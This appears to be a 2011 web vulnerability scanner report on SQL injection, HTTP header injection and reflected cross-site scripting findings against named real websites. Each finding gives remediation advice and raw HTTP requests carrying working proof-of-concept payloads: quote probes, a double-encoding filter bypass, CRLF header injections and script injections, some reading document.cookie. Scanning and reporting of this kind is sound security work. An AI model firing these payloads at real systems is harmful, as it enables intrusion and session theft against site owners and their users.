SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /index.php HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Learning Solutio ...[SNIP]... </b>: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]...
Request 2
GET /index.php HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
The art_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the art_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /news_detail.asp?we_cat=4&art_id=107529'&sid=31063765&con_type=1&d_str=20110127&fc=4 HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 01:57:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=CABDPJKADHMKIKHPIDDLPNCO; path=/
Cache-control: private
<html>
<HTML> <font face="Arial" size=2> <p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e21'</font> <p> <font face="Arial" size=2>ODBC driver does no ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Request 2
GET /?q=bluefin+tuna&hl=en&tab=n1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload e98b7%0d%0a72138907069 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2171139&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0e98b7%0d%0a72138907069; ActivityInfo=000p81bBo%5f; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g
The value of REST URL parameter 3 is copied into the Location response header. The payload 44609%0d%0a823a43cd739 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /locator/locator/44609%0d%0a823a43cd739 HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:10:48 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.26
Set-Cookie: JSESSIONID=6B551B6EF292368753CEA0B23B3B8F3A.ftb-web4; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/44609
823a43cd739?shouldTest=true
Content-Language: en-US
Content-Length: 0
Connection: close
Content-Type: text/plain
The value of REST URL parameter 1 is copied into the Location response header. The payload 49dfd%0d%0ab7061f6f456 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /49dfd%0d%0ab7061f6f456/worldnews/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:12 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/49dfd
b7061f6f456/worldnews/worldnews.asp
The value of REST URL parameter 2 is copied into the Location response header. The payload d412c%0d%0ad95cbc5e854 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /fis/d412c%0d%0ad95cbc5e854/worldnews.asp HTTP/1.1
Host: www.fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 01:52:17 GMT
Connection: close
Location: /fis/error/error.asp?404;http://www.fis.com/fis/d412c
d95cbc5e854/worldnews.asp
3. Cross-site scripting (reflected)
There are 182 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the shifth request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 66993%3balert(1)//766c94fef6e was submitted in the shifth parameter. This input was echoed as 66993;alert(1)//766c94fef6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=066993%3balert(1)//766c94fef6e&shiftv=0&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1 Host: ad.thehill.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Date: Thu, 03 Feb 2011 01:32:17 GMT Content-type: application/x-javascript P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:17 GMT; path=/ Server: lighttpd/1.4.22 Content-Length: 4484
The value of the shiftv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7de03%3balert(1)//1688d5789ce was submitted in the shiftv parameter. This input was echoed as 7de03;alert(1)//1688d5789ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=0&shiftv=07de03%3balert(1)//1688d5789ce&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1 Host: ad.thehill.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Date: Thu, 03 Feb 2011 01:32:12 GMT Content-type: application/x-javascript P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:12 GMT; path=/ Server: lighttpd/1.4.22 Content-Length: 4484
The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc was submitted in the method parameter. This input was echoed as 6c818<img src=a onerror=alert(1)>15cd25761cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?v=1.0&method=links.getStats6c818<img%20src%3da%20onerror%3dalert(1)>15cd25761cc&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Content-Type: text/javascript;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache X-Cnection: close Date: Thu, 03 Feb 2011 01:33:00 GMT Content-Length: 427
The value of the urls request parameter is copied into the HTML document as plain text between tags. The payload 7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5 was submitted in the urls parameter. This input was echoed as 7250b<img src=a onerror=alert(1)>3afeaa161d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fnews.change.org%2Fstories%2Fnobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi%23share_source%3Dblog-top_fb%22%5D7250b<img%20src%3da%20onerror%3dalert(1)>3afeaa161d5&format=json&callback=fb_sharepro_render HTTP/1.1 Host: api.facebook.com Proxy-Connection: keep-alive Referer: http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi?7bf2b%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E36bc7e08caf=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF
Response
HTTP/1.1 200 OK Cache-Control: public, max-age=120 Content-Type: text/javascript;charset=utf-8 Expires: Wed, 02 Feb 2011 17:35:11 -0800 Pragma: X-Cnection: close Date: Thu, 03 Feb 2011 01:33:11 GMT Content-Length: 443
fb_sharepro_render({"error_code":114,"error_msg":"param urls must be an array.","request_args":[{"key":"v","value":"1.0"},{"key":"method","value":"links.getStats"},{"key":"urls","value":"[\"http:\/\/news.change.org\/stories\/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi#share_source=blog-top_fb\"]7250b<img src=a onerror=alert(1)>3afeaa161d5"},{"key":"format","value":"json"},{"key":"callback","value":"fb_sharepro_render"}]});
The value of the format request parameter is copied into the HTML document as plain text between tags. The payload 9ff8c<script>alert(1)</script>d0cbfd0ba59 was submitted in the format parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/click?format=jsonp9ff8c<script>alert(1)</script>d0cbfd0ba59&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 400 Bad Request Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/plain Date: Wed, 02 Feb 2011 23:58:36 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 71 Connection: keep-alive
The value of the jsonp request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e7c41%3balert(1)//89d5419dbd6 was submitted in the jsonp parameter. This input was echoed as e7c41;alert(1)//89d5419dbd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491e7c41%3balert(1)//89d5419dbd6 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript Date: Wed, 02 Feb 2011 23:58:43 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 102 Connection: keep-alive
The value of the out request parameter is copied into the HTML document as plain text between tags. The payload 89bf8<script>alert(1)</script>0d35527ef71 was submitted in the out parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=89bf8<script>alert(1)</script>0d35527ef71&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript Date: Wed, 02 Feb 2011 23:58:41 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 72 Connection: keep-alive
The value of the out request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875ad'%3balert(1)//6f691d8d147 was submitted in the out parameter. This input was echoed as 875ad';alert(1)//6f691d8d147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/click?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&libid=1296685545288&out=http%3A%2F%2Fwww.invisionpower.com%2Fproducts%2Fnexus%2F875ad'%3balert(1)//6f691d8d147&ref=http%3A%2F%2Fcommunity.invisionpower.com%2F&title=IP.Nexus%201.1.3%20Released%20-%20Invision%20Power%20Services&txt=IP.Nexus%20application&jsonp=vglnk_jsonp_12966856382491 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/javascript Date: Wed, 02 Feb 2011 23:58:38 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 103 Connection: keep-alive
The value of the key request parameter is copied into the HTML document as plain text between tags. The payload 4b46b<script>alert(1)</script>e43aee83162 was submitted in the key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162&loc=http%3A%2F%2Fcommunity.invisionpower.com%2Ftopic%2F330971-ipnexus-113-released%2Fpage__pid__2073390%23entry2073390&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966856066450 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vglnk.Agent.p=412aef8ac4db8eca6d18ab69d3a4b53c
Response
HTTP/1.1 500 Internal Server Error Cache-Control: no-store, no-cache, must-revalidate Content-Language: en Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 02 Feb 2011 22:26:57 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Vary: Accept-Encoding Connection: keep-alive Content-Length: 97
error: Unknown api key: 4f085ab2452b05f4c24c6b37dbc58a3b4b46b<script>alert(1)</script>e43aee83162
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42e41</script><script>alert(1)</script>a2217655438 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
